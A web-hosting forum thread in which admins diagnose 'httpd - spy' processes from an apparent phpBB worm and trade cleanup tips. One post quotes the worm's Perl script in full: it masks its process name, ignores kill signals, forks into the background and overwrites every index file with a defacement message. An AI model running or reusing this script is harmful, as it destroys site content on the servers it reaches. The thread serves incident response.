These days I found my server have A LOT of "Spy"??

5022 root 16 0 15144 6148 12436 S 33.0 0.5 0:08 0 /usr/local/apache/bin/httpd -DSSL
5152 mysql 15 0 52288 20M 3756 S 13.3 2.0 4:36 0 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --use
6954 nobody 15 0 12292 7732 6304 S 3.3 0.7 0:01 0 /usr/local/sbin/httpd - spy
6913 nobody 16 0 11000 6452 6304 S 2.7 0.6 0:00 1 /usr/local/sbin/httpd - spy
14847 nobody 16 0 16340 8556 8104 S 1.9 0.8 0:21 0 /usr/local/sbin/httpd - spy
31062 nobody 15 0 15400 8928 8104 D 1.7 0.8 0:09 1 /usr/local/sbin/httpd - spy
21314 nobody 15 0 18780 11M 8104 S 1.5 1.1 0:12 0 /usr/local/sbin/httpd - spy
6417 nobody 16 0 13144 8216 6304 S 1.5 0.7 0:04 1 /usr/local/sbin/httpd - spy
7442 root 17 0 5436 1528 4892 R 1.5 0.1 0:01 0 top -c
27251 nobody 16 0 14840 7748 8104 S 1.3 0.7 0:25 1 /usr/local/sbin/httpd - spy
4446 nobody 16 0 12216 7608 6304 S 1.1 0.7 0:02 1 /usr/local/sbin/httpd - spy
7204 nobody 16 0 11504 6856 6304 S 1.1 0.6 0:00 1 /usr/local/sbin/httpd - spy
7779 mailnull 18 0 0 0 0 Z 1.1 0.0 0:00 0 exim <defunct>
13375 nobody 15 0 12340 6172 6304 S 0.9 0.5 0:08 0 /usr/local/sbin/httpd - spy
27100 nobody 15 0 16336 10M 6304 S 0.9 1.0 0:10 0 /usr/local/sbin/httpd - spy
28185 nobody 15 0 12568 6652 6304 S 0.7 0.6 0:07 0 /usr/local/sbin/httpd - spy
9969 nobody 15 0 9052 3728 6140 S 0.5 0.3 0:00 0 /usr/local/sbin/httpd - spy
22134 nobody 15 0 11312 5420 6140 S 0.5 0.5 0:10 0 /usr/local/sbin/httpd - spy
29751 nobody 15 0 11556 5540 6140 S 0.5 0.5 0:08 1 /usr/local/sbin/httpd - spy
4958 mailnull 15 0 6600 1716 6144 S 0.3 0.1 0:01 0 /usr/sbin/exim -bd -q60m
19674 nobody 15 0 11172 5320 6140 S 0.3 0.5 0:10 1 /usr/local/sbin/httpd - spy
22435 nobody 15 0 19504 11M 8104 S 0.3 1.1 0:22 0 /usr/local/sbin/httpd - spy
22476 nobody 16 0 12076 5536 6304 S 0.3 0.5 0:03 0 /usr/local/sbin/httpd - spy
29277 nobody 15 0 11552 5584 6140 S 0.3 0.5 0:08 0 /usr/local/sbin/httpd - spy
30049 nobody 15 0 11552 5588 6140 S 0.3 0.5 0:07 1 /usr/local/sbin/httpd - spy
31240 nobody 15 0 11668 5680 6140 S 0.3 0.5 0:07 0 /usr/local/sbin/httpd - spy
4449 nobody 15 0 11672 7092 6140 S 0.3 0.6 0:02 0 /usr/local/sbin/httpd - spy
6103 nobody 15 0 11808 6952 6140 S 0.3 0.6 0:01 0 /usr/local/sbin/httpd - spy
6420 nobody 15 0 11820 6628 6140 S 0.3 0.6 0:00 1 /usr/local/sbin/httpd - spy
6957 nobody 15 0 11824 7212 6140 S 0.3 0.6 0:00 0 /usr/local/sbin/httpd - spy
563 root 15 0 0 0 0 SW 0.1 0.0 0:00 1 kjournald


what is this really?

cheers

It's actually a perl script that is executed.

Look in your /tmp directory. You probably have 4-5 .txt files in there.

Quarantine those files and kill those "spy" processes.

em.. I have a lot of txt on /tmp!!!

I have let /tmp noexec how could they run it!!!

what shall I do now?

We had this on one of our servers. Killing the process, removing the files form the tmp and upgrading to 4.3.10 fix the issue for us.

Seems to be linked to the phpbb security issue.

What im wondering about is how they got the files in your /usr/local/sbin

In my tmp file I found owned.txt which has this:

==================

#!/usr/bin/perl

my $processo = "/usr/local/sbin/httpd - spy";
$SIG{"INT"} = "IGNORE";
$SIG{"HUP"} = "IGNORE";
$SIG{"TERM"} = "IGNORE";
$SIG{"CHLD"} = "IGNORE";
$SIG{"PS"} = "IGNORE";

$0="$processo".""x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);

`find / -name index.* >> index`;

open(a,"<index");
@ind = <a>;
close(a);

foreach(@ind){
chomp;
`echo spykids ownz your server > $_`;
}

`perl zone.txt`;

This is part of a new phpBB worm variant, apparently some of them run as -spy. The new versions are apparently working even with patched phpbb's.

Originally posted by eth00
This is part of a new phpBB worm variant, apparently some of them run as -spy. The new versions are apparently working even with patched phpbb's.

Any update on how to clean a system? We have removed all the files we could find on the system and killed all the proccess, they still keep coming back.

Lot of articles on Google about this subject, seemed they hit 50 major business in Africa also.

http://www.tecrime.com/llartH18.htm

Originally posted by eMax
Any update on how to clean a system? We have removed all the files we could find on the system and killed all the proccess, they still keep coming back.

Until you figure out where it is coming from you could always remove the perl binary. Then you might start getting errors in messages that will give you some clues. If nothing else would stop the processes from reappearing until you can figure out what it is. Depending on how they created it you might be able to reboot the server...but still on your server someplace.

Originally posted by eMax
Any update on how to clean a system? We have removed all the files we could find on the system and killed all the proccess, they still keep coming back.


If you dont secure the server any more then it currently is, they are going to come back because there is nothign there to stop them.

Originally posted by eth00
Until you figure out where it is coming from you could always remove the perl binary. Then you might start getting errors in messages that will give you some clues. If nothing else would stop the processes from reappearing until you can figure out what it is. Depending on how they created it you might be able to reboot the server...but still on your server someplace.

Why remove the perl binary? Does not sound very smart

Just clear /tmp and disable wget for non-root users.

Originally posted by KingAdmin
Just clear /tmp and disable wget for non-root users.

Thats a weak way to fix it.... ive seen attacks going around using lynx and/or curl instead of wget

Originally posted by thelinuxguy
Thats a weak way to fix it.... ive seen attacks going around using lynx and/or curl instead of wget

No disrespect but I have seen you trash 2 peoples suggestions but you have YET to post one.

Step up or pipe up..I guess the old saying goes.:o

Originally posted by thelinuxguy
What im wondering about is how they got the files in your /usr/local/sbin
Just because the script claims its path is in /usr/local/sbin doesn't mean that is a real path where it's located.

We remove all. txt files on /tmp and close all dangerouse phpBB scripts. things seems a bit calm down now